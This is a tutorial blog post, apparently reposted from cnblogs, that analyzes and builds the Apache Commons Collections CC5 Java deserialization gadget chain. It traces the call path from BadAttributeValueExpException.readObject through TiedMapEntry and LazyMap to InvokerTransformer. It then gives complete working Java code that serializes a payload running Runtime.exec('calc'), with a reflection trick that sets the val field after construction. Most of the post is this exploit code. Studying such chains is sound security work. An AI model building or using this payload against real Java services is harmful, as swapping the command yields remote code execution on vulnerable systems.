
cc5

Time: 2024-07-26 19:41:35
Tags: BadAttributeValueExpException cc5 Object Class new null class

CC5

Step 1

Analysis
BadAttributeValueExpException.readObject is the entry point. Inside readObject we can see a call to toString:

private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
    ObjectInputStream.GetField gf = ois.readFields();
    Object valObj = gf.get("val", null);

    if (valObj == null) {
        val = null;
    } else if (valObj instanceof String) {
        val = valObj;
    } else if (System.getSecurityManager() == null
            || valObj instanceof Long
            || valObj instanceof Integer
            || valObj instanceof Float
            || valObj instanceof Double
            || valObj instanceof Byte
            || valObj instanceof Short
            || valObj instanceof Boolean) {
        val = valObj.toString();
    } else { // the serialized object is from a version without JDK-8019292 fix
        val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
    }
}

When val is a TiedMapEntry, this calls TiedMapEntry.toString, which calls getKey() and getValue():

public String toString() {
    return getKey() + "=" + getValue();
}

getValue calls get on the wrapped map:

public Object getValue() {
    return map.get(key);
}

LazyMap.get calls transform on its factory when the key is not already in the map:

public Object get(Object key) {
    // create value for key if key is not currently in the map
    if (map.containsKey(key) == false) {
        Object value = factory.transform(key);
        map.put(key, value);
        return value;
    }
    return map.get(key);
}

From here on the chain is the same as CC1, so we will not analyze it again.

Step 2

Assign the values

    Transformer[] transformers = {
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
        new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
        new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    HashMap<Object, Object> hashMap = new HashMap<>();
    Map decorateMap = LazyMap.decorate(hashMap, chainedTransformer);
    TiedMapEntry tiedMapEntry = new TiedMapEntry(decorateMap, "1");
    BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(tiedMapEntry);

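This already triggers the chain, but it fires before readObject is ever reached, because the BadAttributeValueExpException constructor itself calls toString on a non-null argument. So we pass null to the constructor, BadAttributeValueExpException(null), and set the val field afterwards via reflection: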

BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
Class c = Class.forName("javax.management.BadAttributeValueExpException");
Field field = c.getDeclaredField("val");
field.setAccessible(true);
field.set(badAttributeValueExpException, tiedMapEntry);

Running the code

    Transformer[] transformers = {
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
        new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
        new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    HashMap<Object, Object> hashMap = new HashMap<>();
    Map decorateMap = LazyMap.decorate(hashMap, chainedTransformer);
    TiedMapEntry tiedMapEntry = new TiedMapEntry(decorateMap, "1");
    BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null); // step 1
    Class c = Class.forName("javax.management.BadAttributeValueExpException");
    Field field = c.getDeclaredField("val");
    field.setAccessible(true);
    field.set(badAttributeValueExpException, tiedMapEntry);
    serialize(badAttributeValueExpException);
    unserialize("ser.bin");

Complete code

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class cc5 {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object, Object> hashMap = new HashMap<>();
        Map decorateMap = LazyMap.decorate(hashMap, chainedTransformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(decorateMap, "1");
        // Step 1: new BadAttributeValueExpException(tiedMapEntry) would trigger the chain
        // right here, before readObject, so the constructor is given null instead.
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        // Set the private val field via reflection after construction.
        Class c = Class.forName("javax.management.BadAttributeValueExpException");
        Field field = c.getDeclaredField("val");
        field.setAccessible(true);
        field.set(badAttributeValueExpException, tiedMapEntry);
        serialize(badAttributeValueExpException);
        unserialize("ser.bin"); // step 2
    }

    // Write the object to ser.bin.
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    // Read the object back; readObject of the entry class runs here.
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}

From: https://www.cnblogs.com/20031225gbz/p/18326095
